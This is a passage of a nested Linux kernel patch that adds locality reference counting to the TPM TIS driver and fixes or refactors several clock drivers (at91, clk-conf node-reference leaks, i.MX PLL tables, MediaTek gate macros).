++		priv->locality_count++;
++	mutex_unlock(&priv->locality_count_mutex);
++	return ret;
++}
++
+ static u8 tpm_tis_status(struct tpm_chip *chip)
+ {
+ 	struct tpm_tis_data *priv = dev_get_drvdata(&chip->dev);
+@@ -652,7 +677,7 @@ static int probe_itpm(struct tpm_chip *chip)
+ 	if (vendor != TPM_VID_INTEL)
+ 		return 0;
+ 
+-	if (request_locality(chip, 0) != 0)
++	if (tpm_tis_request_locality(chip, 0) != 0)
+ 		return -EBUSY;
+ 
+ 	rc = tpm_tis_send_data(chip, cmd_getticks, len);
+@@ -673,7 +698,7 @@ static int probe_itpm(struct tpm_chip *chip)
+ 
+ out:
+ 	tpm_tis_ready(chip);
+-	release_locality(chip, priv->locality);
++	tpm_tis_relinquish_locality(chip, priv->locality);
+ 
+ 	return rc;
+ }
+@@ -732,25 +757,17 @@ static irqreturn_t tis_int_handler(int dummy, void *dev_id)
+ 	return IRQ_HANDLED;
+ }
+ 
+-static int tpm_tis_gen_interrupt(struct tpm_chip *chip)
++static void tpm_tis_gen_interrupt(struct tpm_chip *chip)
+ {
+ 	const char *desc = "attempting to generate an interrupt";
+ 	u32 cap2;
+ 	cap_t cap;
+ 	int ret;
+ 
+-	ret = request_locality(chip, 0);
+-	if (ret < 0)
+-		return ret;
+-
+ 	if (chip->flags & TPM_CHIP_FLAG_TPM2)
+ 		ret = tpm2_get_tpm_pt(chip, 0x100, &cap2, desc);
+ 	else
+ 		ret = tpm1_getcap(chip, TPM_CAP_PROP_TIS_TIMEOUT, &cap, desc, 0);
+-
+-	release_locality(chip, 0);
+-
+-	return ret;
+ }
+ 
+ /* Register the IRQ and issue a command that will cause an interrupt. If an
+@@ -773,52 +790,55 @@ static int tpm_tis_probe_irq_single(struct tpm_chip *chip, u32 intmask,
+ 	}
+ 	priv->irq = irq;
+ 
++	rc = tpm_tis_request_locality(chip, 0);
++	if (rc < 0)
++		return rc;
++
+ 	rc = tpm_tis_read8(priv, TPM_INT_VECTOR(priv->locality),
+ 			   &original_int_vec);
+-	if (rc < 0)
++	if (rc < 0) {
++		tpm_tis_relinquish_locality(chip, priv->locality);
+ 		return rc;
++	}
+ 
+ 	rc = tpm_tis_write8(priv, TPM_INT_VECTOR(priv->locality), irq);
+ 	if (rc < 0)
+-		return rc;
++		goto restore_irqs;
+ 
+ 	rc = tpm_tis_read32(priv, TPM_INT_STATUS(priv->locality), &int_status);
+ 	if (rc < 0)
+-		return rc;
++		goto restore_irqs;
+ 
+ 	/* Clear all existing */
+ 	rc = tpm_tis_write32(priv, TPM_INT_STATUS(priv->locality), int_status);
+ 	if (rc < 0)
+-		return rc;
+-
++		goto restore_irqs;
+ 	/* Turn on */
+ 	rc = tpm_tis_write32(priv, TPM_INT_ENABLE(priv->locality),
+ 			     intmask | TPM_GLOBAL_INT_ENABLE);
+ 	if (rc < 0)
+-		return rc;
++		goto restore_irqs;
+ 
+ 	priv->irq_tested = false;
+ 
+ 	/* Generate an interrupt by having the core call through to
+ 	 * tpm_tis_send
+ 	 */
+-	rc = tpm_tis_gen_interrupt(chip);
+-	if (rc < 0)
+-		return rc;
++	tpm_tis_gen_interrupt(chip);
+ 
++restore_irqs:
+ 	/* tpm_tis_send will either confirm the interrupt is working or it
+ 	 * will call disable_irq which undoes all of the above.
+ 	 */
+ 	if (!(chip->flags & TPM_CHIP_FLAG_IRQ)) {
+-		rc = tpm_tis_write8(priv, original_int_vec,
+-				TPM_INT_VECTOR(priv->locality));
+-		if (rc < 0)
+-			return rc;
+-
+-		return 1;
++		tpm_tis_write8(priv, original_int_vec,
++			       TPM_INT_VECTOR(priv->locality));
++		rc = -1;
+ 	}
+ 
+-	return 0;
++	tpm_tis_relinquish_locality(chip, priv->locality);
++
++	return rc;
+ }
+ 
+ /* Try to find the IRQ the TPM is using. This is for legacy x86 systems that
+@@ -932,8 +952,8 @@ static const struct tpm_class_ops tpm_tis = {
+ 	.req_complete_mask = TPM_STS_DATA_AVAIL | TPM_STS_VALID,
+ 	.req_complete_val = TPM_STS_DATA_AVAIL | TPM_STS_VALID,
+ 	.req_canceled = tpm_tis_req_canceled,
+-	.request_locality = request_locality,
+-	.relinquish_locality = release_locality,
++	.request_locality = tpm_tis_request_locality,
++	.relinquish_locality = tpm_tis_relinquish_locality,
+ 	.clk_enable = tpm_tis_clkrun_enable,
+ };
+ 
+@@ -967,6 +987,8 @@ int tpm_tis_core_init(struct device *dev, struct tpm_tis_data *priv, int irq,
+ 	priv->timeout_min = TPM_TIMEOUT_USECS_MIN;
+ 	priv->timeout_max = TPM_TIMEOUT_USECS_MAX;
+ 	priv->phy_ops = phy_ops;
++	priv->locality_count = 0;
++	mutex_init(&priv->locality_count_mutex);
+ 
+ 	dev_set_drvdata(&chip->dev, priv);
+ 
+@@ -1013,14 +1035,14 @@ int tpm_tis_core_init(struct device *dev, struct tpm_tis_data *priv, int irq,
+ 		   TPM_INTF_DATA_AVAIL_INT | TPM_INTF_STS_VALID_INT;
+ 	intmask &= ~TPM_GLOBAL_INT_ENABLE;
+ 
+-	rc = request_locality(chip, 0);
++	rc = tpm_tis_request_locality(chip, 0);
+ 	if (rc < 0) {
+ 		rc = -ENODEV;
+ 		goto out_err;
+ 	}
+ 
+ 	tpm_tis_write32(priv, TPM_INT_ENABLE(priv->locality), intmask);
+-	release_locality(chip, 0);
++	tpm_tis_relinquish_locality(chip, 0);
+ 
+ 	rc = tpm_chip_start(chip);
+ 	if (rc)
+@@ -1080,13 +1102,13 @@ int tpm_tis_core_init(struct device *dev, struct tpm_tis_data *priv, int irq,
+ 		 * proper timeouts for the driver.
+ 		 */
+ 
+-		rc = request_locality(chip, 0);
++		rc = tpm_tis_request_locality(chip, 0);
+ 		if (rc < 0)
+ 			goto out_err;
+ 
+ 		rc = tpm_get_timeouts(chip);
+ 
+-		release_locality(chip, 0);
++		tpm_tis_relinquish_locality(chip, 0);
+ 
+ 		if (rc) {
+ 			dev_err(dev, "Could not get TPM timeouts and durations\n");
+@@ -1094,17 +1116,21 @@ int tpm_tis_core_init(struct device *dev, struct tpm_tis_data *priv, int irq,
+ 			goto out_err;
+ 		}
+ 
+-		if (irq) {
++		if (irq)
+ 			tpm_tis_probe_irq_single(chip, intmask, IRQF_SHARED,
+ 						 irq);
+-			if (!(chip->flags & TPM_CHIP_FLAG_IRQ)) {
+-				dev_err(&chip->dev, FW_BUG
++		else
++			tpm_tis_probe_irq(chip, intmask);
++
++		if (!(chip->flags & TPM_CHIP_FLAG_IRQ)) {
++			dev_err(&chip->dev, FW_BUG
+ 					"TPM interrupt not working, polling instead\n");
+ 
+-				disable_interrupts(chip);
+-			}
+-		} else {
+-			tpm_tis_probe_irq(chip, intmask);
++			rc = tpm_tis_request_locality(chip, 0);
++			if (rc < 0)
++				goto out_err;
++			disable_interrupts(chip);
++			tpm_tis_relinquish_locality(chip, 0);
+ 		}
+ 	}
+ 
+@@ -1165,28 +1191,27 @@ int tpm_tis_resume(struct device *dev)
+ 	struct tpm_chip *chip = dev_get_drvdata(dev);
+ 	int ret;
+ 
++	ret = tpm_tis_request_locality(chip, 0);
++	if (ret < 0)
++		return ret;
++
+ 	if (chip->flags & TPM_CHIP_FLAG_IRQ)
+ 		tpm_tis_reenable_interrupts(chip);
+ 
+ 	ret = tpm_pm_resume(dev);
+ 	if (ret)
+-		return ret;
++		goto out;
+ 
+ 	/*
+ 	 * TPM 1.2 requires self-test on resume. This function actually returns
+ 	 * an error code but for unknown reason it isn't handled.
+ 	 */
+-	if (!(chip->flags & TPM_CHIP_FLAG_TPM2)) {
+-		ret = request_locality(chip, 0);
+-		if (ret < 0)
+-			return ret;
+-
++	if (!(chip->flags & TPM_CHIP_FLAG_TPM2))
+ 		tpm1_do_selftest(chip);
++out:
++	tpm_tis_relinquish_locality(chip, 0);
+ 
+-		release_locality(chip, 0);
+-	}
+-
+-	return 0;
++	return ret;
+ }
+ EXPORT_SYMBOL_GPL(tpm_tis_resume);
+ #endif
+diff --git a/drivers/char/tpm/tpm_tis_core.h b/drivers/char/tpm/tpm_tis_core.h
+index b68479e0de10f..1d51d5168fb6e 100644
+--- a/drivers/char/tpm/tpm_tis_core.h
++++ b/drivers/char/tpm/tpm_tis_core.h
+@@ -91,6 +91,8 @@ enum tpm_tis_flags {
+ 
+ struct tpm_tis_data {
+ 	u16 manufacturer_id;
++	struct mutex locality_count_mutex;
++	unsigned int locality_count;
+ 	int locality;
+ 	int irq;
+ 	bool irq_tested;
+diff --git a/drivers/clk/at91/clk-sam9x60-pll.c b/drivers/clk/at91/clk-sam9x60-pll.c
+index d757003004cbb..0882ed01d5c27 100644
+--- a/drivers/clk/at91/clk-sam9x60-pll.c
++++ b/drivers/clk/at91/clk-sam9x60-pll.c
+@@ -668,7 +668,7 @@ sam9x60_clk_register_frac_pll(struct regmap *regmap, spinlock_t *lock,
+ 
+ 		ret = sam9x60_frac_pll_compute_mul_frac(&frac->core, FCORE_MIN,
+ 							parent_rate, true);
+-		if (ret <= 0) {
++		if (ret < 0) {
+ 			hw = ERR_PTR(ret);
+ 			goto free;
+ 		}
+diff --git a/drivers/clk/clk-conf.c b/drivers/clk/clk-conf.c
+index 2ef819606c417..1a4e6340f95ce 100644
+--- a/drivers/clk/clk-conf.c
++++ b/drivers/clk/clk-conf.c
+@@ -33,9 +33,12 @@ static int __set_clk_parents(struct device_node *node, bool clk_supplier)
+ 			else
+ 				return rc;
+ 		}
+-		if (clkspec.np == node && !clk_supplier)
++		if (clkspec.np == node && !clk_supplier) {
++			of_node_put(clkspec.np);
+ 			return 0;
++		}
+ 		pclk = of_clk_get_from_provider(&clkspec);
++		of_node_put(clkspec.np);
+ 		if (IS_ERR(pclk)) {
+ 			if (PTR_ERR(pclk) != -EPROBE_DEFER)
+ 				pr_warn("clk: couldn't get parent clock %d for %pOF\n",
+@@ -48,10 +51,12 @@ static int __set_clk_parents(struct device_node *node, bool clk_supplier)
+ 		if (rc < 0)
+ 			goto err;
+ 		if (clkspec.np == node && !clk_supplier) {
++			of_node_put(clkspec.np);
+ 			rc = 0;
+ 			goto err;
+ 		}
+ 		clk = of_clk_get_from_provider(&clkspec);
++		of_node_put(clkspec.np);
+ 		if (IS_ERR(clk)) {
+ 			if (PTR_ERR(clk) != -EPROBE_DEFER)
+ 				pr_warn("clk: couldn't get assigned clock %d for %pOF\n",
+@@ -93,10 +98,13 @@ static int __set_clk_rates(struct device_node *node, bool clk_supplier)
+ 				else
+ 					return rc;
+ 			}
+-			if (clkspec.np == node && !clk_supplier)
++			if (clkspec.np == node && !clk_supplier) {
++				of_node_put(clkspec.np);
+ 				return 0;
++			}
+ 
+ 			clk = of_clk_get_from_provider(&clkspec);
++			of_node_put(clkspec.np);
+ 			if (IS_ERR(clk)) {
+ 				if (PTR_ERR(clk) != -EPROBE_DEFER)
+ 					pr_warn("clk: couldn't get clock %d for %pOF\n",
+diff --git a/drivers/clk/imx/clk-fracn-gppll.c b/drivers/clk/imx/clk-fracn-gppll.c
+index a2aaa14fc1aef..f6674110a88e0 100644
+--- a/drivers/clk/imx/clk-fracn-gppll.c
++++ b/drivers/clk/imx/clk-fracn-gppll.c
+@@ -15,6 +15,7 @@
+ #include "clk.h"
+ 
+ #define PLL_CTRL		0x0
++#define HW_CTRL_SEL		BIT(16)
+ #define CLKMUX_BYPASS		BIT(2)
+ #define CLKMUX_EN		BIT(1)
+ #define POWERUP_MASK		BIT(0)
+@@ -60,18 +61,20 @@ struct clk_fracn_gppll {
+ };
+ 
+ /*
+- * Fvco = Fref * (MFI + MFN / MFD)
+- * Fout = Fvco / (rdiv * odiv)
++ * Fvco = (Fref / rdiv) * (MFI + MFN / MFD)
++ * Fout = Fvco / odiv
++ * The (Fref / rdiv) should be in range 20MHz to 40MHz
++ * The Fvco should be in range 2.5Ghz to 5Ghz
+  */
+ static const struct imx_fracn_gppll_rate_table fracn_tbl[] = {
+-	PLL_FRACN_GP(650000000U, 81, 0, 1, 0, 3),
++	PLL_FRACN_GP(650000000U, 162, 50, 100, 0, 6),
+ 	PLL_FRACN_GP(594000000U, 198, 0, 1, 0, 8),
+-	PLL_FRACN_GP(560000000U, 70, 0, 1, 0, 3),
+-	PLL_FRACN_GP(498000000U, 83, 0, 1, 0, 4),
++	PLL_FRACN_GP(560000000U, 140, 0, 1, 0, 6),
++	PLL_FRACN_GP(498000000U, 166, 0, 1, 0, 8),
+ 	PLL_FRACN_GP(484000000U, 121, 0, 1, 0, 6),
+ 	PLL_FRACN_GP(445333333U, 167, 0, 1, 0, 9),
+-	PLL_FRACN_GP(400000000U, 50, 0, 1, 0, 3),
+-	PLL_FRACN_GP(393216000U, 81, 92, 100, 0, 5)
++	PLL_FRACN_GP(400000000U, 200, 0, 1, 0, 12),
++	PLL_FRACN_GP(393216000U, 163, 84, 100, 0, 10)
+ };
+ 
+ struct imx_fracn_gppll_clk imx_fracn_gppll = {
+@@ -191,6 +194,11 @@ static int clk_fracn_gppll_set_rate(struct clk_hw *hw, unsigned long drate,
+ 
+ 	rate = imx_get_pll_settings(pll, drate);
+ 
++	/* Hardware control select disable. PLL is control by register */
++	tmp = readl_relaxed(pll->base + PLL_CTRL);
++	tmp &= ~HW_CTRL_SEL;
++	writel_relaxed(tmp, pll->base + PLL_CTRL);
++
+ 	/* Disable output */
+ 	tmp = readl_relaxed(pll->base + PLL_CTRL);
+ 	tmp &= ~CLKMUX_EN;
+diff --git a/drivers/clk/imx/clk-imx8ulp.c b/drivers/clk/imx/clk-imx8ulp.c
+index 8eb1af2d64298..ca0e4a3aa454e 100644
+--- a/drivers/clk/imx/clk-imx8ulp.c
++++ b/drivers/clk/imx/clk-imx8ulp.c
+@@ -200,8 +200,8 @@ static int imx8ulp_clk_cgc1_init(struct platform_device *pdev)
+ 	clks[IMX8ULP_CLK_NIC_AD_DIVPLAT] = imx_clk_hw_divider_flags("nic_ad_divplat", "nic_sel", base + 0x34, 21, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
+ 	clks[IMX8ULP_CLK_NIC_PER_DIVPLAT] = imx_clk_hw_divider_flags("nic_per_divplat", "nic_ad_divplat", base + 0x34, 14, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
+ 	clks[IMX8ULP_CLK_XBAR_AD_DIVPLAT] = imx_clk_hw_divider_flags("xbar_ad_divplat", "nic_ad_divplat", base + 0x38, 14, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
+-	clks[IMX8ULP_CLK_XBAR_DIVBUS] = imx_clk_hw_divider_flags("xbar_divbus", "nic_ad_divplat", base + 0x38, 7, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
+-	clks[IMX8ULP_CLK_XBAR_AD_SLOW] = imx_clk_hw_divider_flags("xbar_ad_slow", "nic_ad_divplat", base + 0x38, 0, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
++	clks[IMX8ULP_CLK_XBAR_DIVBUS] = imx_clk_hw_divider_flags("xbar_divbus", "xbar_ad_divplat", base + 0x38, 7, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
++	clks[IMX8ULP_CLK_XBAR_AD_SLOW] = imx_clk_hw_divider_flags("xbar_ad_slow", "xbar_divbus", base + 0x38, 0, 6, CLK_SET_RATE_PARENT | CLK_IS_CRITICAL);
+ 
+ 	clks[IMX8ULP_CLK_SOSC_DIV1_GATE] = imx_clk_hw_gate_dis("sosc_div1_gate", "sosc", base + 0x108, 7);
+ 	clks[IMX8ULP_CLK_SOSC_DIV2_GATE] = imx_clk_hw_gate_dis("sosc_div2_gate", "sosc", base + 0x108, 15);
+diff --git a/drivers/clk/mediatek/clk-mt2701-aud.c b/drivers/clk/mediatek/clk-mt2701-aud.c
+index 6ba398eb7df91..4287bd3f545ee 100644
+--- a/drivers/clk/mediatek/clk-mt2701-aud.c
++++ b/drivers/clk/mediatek/clk-mt2701-aud.c
+@@ -15,41 +15,17 @@
+ 
+ #include <dt-bindings/clock/mt2701-clk.h>
+ 
+-#define GATE_AUDIO0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO0(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO1(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO2(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio2_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO3(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio3_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO3(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio3_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate_regs audio0_cg_regs = {
+ 	.set_ofs = 0x0,
+diff --git a/drivers/clk/mediatek/clk-mt2701-bdp.c b/drivers/clk/mediatek/clk-mt2701-bdp.c
+index 435ed4819d563..b0f0572079452 100644
+--- a/drivers/clk/mediatek/clk-mt2701-bdp.c
++++ b/drivers/clk/mediatek/clk-mt2701-bdp.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs bdp1_cg_regs = {
+ 	.sta_ofs = 0x0110,
+ };
+ 
+-#define GATE_BDP0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &bdp0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_BDP0(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &bdp0_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_BDP1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &bdp1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_BDP1(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &bdp1_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate bdp_clks[] = {
+ 	GATE_BDP0(CLK_BDP_BRG_BA, "brg_baclk", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2701-eth.c b/drivers/clk/mediatek/clk-mt2701-eth.c
+index edf1e2ed2b596..601358748750e 100644
+--- a/drivers/clk/mediatek/clk-mt2701-eth.c
++++ b/drivers/clk/mediatek/clk-mt2701-eth.c
+@@ -16,14 +16,8 @@ static const struct mtk_gate_regs eth_cg_regs = {
+ 	.sta_ofs = 0x0030,
+ };
+ 
+-#define GATE_ETH(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &eth_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_ETH(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &eth_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate eth_clks[] = {
+ 	GATE_ETH(CLK_ETHSYS_HSDMA, "hsdma_clk", "ethif_sel", 5),
+diff --git a/drivers/clk/mediatek/clk-mt2701-g3d.c b/drivers/clk/mediatek/clk-mt2701-g3d.c
+index 1458109d99d94..8d1fc8e3336eb 100644
+--- a/drivers/clk/mediatek/clk-mt2701-g3d.c
++++ b/drivers/clk/mediatek/clk-mt2701-g3d.c
+@@ -16,14 +16,8 @@
+ 
+ #include <dt-bindings/clock/mt2701-clk.h>
+ 
+-#define GATE_G3D(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &g3d_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_G3D(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &g3d_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate_regs g3d_cg_regs = {
+ 	.sta_ofs = 0x0,
+diff --git a/drivers/clk/mediatek/clk-mt2701-hif.c b/drivers/clk/mediatek/clk-mt2701-hif.c
+index 434cbbe8c0371..edeeb033a2350 100644
+--- a/drivers/clk/mediatek/clk-mt2701-hif.c
++++ b/drivers/clk/mediatek/clk-mt2701-hif.c
+@@ -16,14 +16,8 @@ static const struct mtk_gate_regs hif_cg_regs = {
+ 	.sta_ofs = 0x0030,
+ };
+ 
+-#define GATE_HIF(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &hif_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_HIF(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &hif_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate hif_clks[] = {
+ 	GATE_HIF(CLK_HIFSYS_USB0PHY, "usb0_phy_clk", "ethpll_500m_ck", 21),
+diff --git a/drivers/clk/mediatek/clk-mt2701-img.c b/drivers/clk/mediatek/clk-mt2701-img.c
+index 7e53deb7f9905..eb172473f0755 100644
+--- a/drivers/clk/mediatek/clk-mt2701-img.c
++++ b/drivers/clk/mediatek/clk-mt2701-img.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs img_cg_regs = {
+ 	.sta_ofs = 0x0000,
+ };
+ 
+-#define GATE_IMG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &img_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IMG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &img_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate img_clks[] = {
+ 	GATE_IMG(CLK_IMG_SMI_COMM, "img_smi_comm", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2701-mm.c b/drivers/clk/mediatek/clk-mt2701-mm.c
+index 9ea7abad99d23..eb069f3bc9a2b 100644
+--- a/drivers/clk/mediatek/clk-mt2701-mm.c
++++ b/drivers/clk/mediatek/clk-mt2701-mm.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs disp1_cg_regs = {
+ 	.sta_ofs = 0x0110,
+ };
+ 
+-#define GATE_DISP0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &disp0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_DISP0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &disp0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_DISP1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &disp1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_DISP1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &disp1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mm_clks[] = {
+ 	GATE_DISP0(CLK_MM_SMI_COMMON, "mm_smi_comm", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2701-vdec.c b/drivers/clk/mediatek/clk-mt2701-vdec.c
+index d3089da0ab62e..0f07c5d731df6 100644
+--- a/drivers/clk/mediatek/clk-mt2701-vdec.c
++++ b/drivers/clk/mediatek/clk-mt2701-vdec.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs vdec1_cg_regs = {
+ 	.sta_ofs = 0x0008,
+ };
+ 
+-#define GATE_VDEC0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec0_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_VDEC1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec1_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate vdec_clks[] = {
+ 	GATE_VDEC0(CLK_VDEC_CKGEN, "vdec_cken", "vdec_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2701.c b/drivers/clk/mediatek/clk-mt2701.c
+index 9b442af37e672..1c3a93143dc5e 100644
+--- a/drivers/clk/mediatek/clk-mt2701.c
++++ b/drivers/clk/mediatek/clk-mt2701.c
+@@ -636,14 +636,8 @@ static const struct mtk_gate_regs top_aud_cg_regs = {
+ 	.sta_ofs = 0x012C,
+ };
+ 
+-#define GATE_TOP_AUD(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top_aud_cg_regs,		\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_TOP_AUD(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &top_aud_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate top_clks[] = {
+ 	GATE_TOP_AUD(CLK_TOP_AUD_48K_TIMING, "a1sys_hp_ck", "aud_mux1_div",
+@@ -701,14 +695,8 @@ static const struct mtk_gate_regs infra_cg_regs = {
+ 	.sta_ofs = 0x0048,
+ };
+ 
+-#define GATE_ICG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &infra_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_ICG(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate infra_clks[] = {
+ 	GATE_ICG(CLK_INFRA_DBG, "dbgclk", "axi_sel", 0),
+@@ -822,23 +810,11 @@ static const struct mtk_gate_regs peri1_cg_regs = {
+ 	.sta_ofs = 0x001c,
+ };
+ 
+-#define GATE_PERI0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate peri_clks[] = {
+ 	GATE_PERI0(CLK_PERI_USB0_MCU, "usb0_mcu_ck", "axi_sel", 31),
+diff --git a/drivers/clk/mediatek/clk-mt2712-bdp.c b/drivers/clk/mediatek/clk-mt2712-bdp.c
+index 684d03e9f6de1..5e668651dd901 100644
+--- a/drivers/clk/mediatek/clk-mt2712-bdp.c
++++ b/drivers/clk/mediatek/clk-mt2712-bdp.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs bdp_cg_regs = {
+ 	.sta_ofs = 0x100,
+ };
+ 
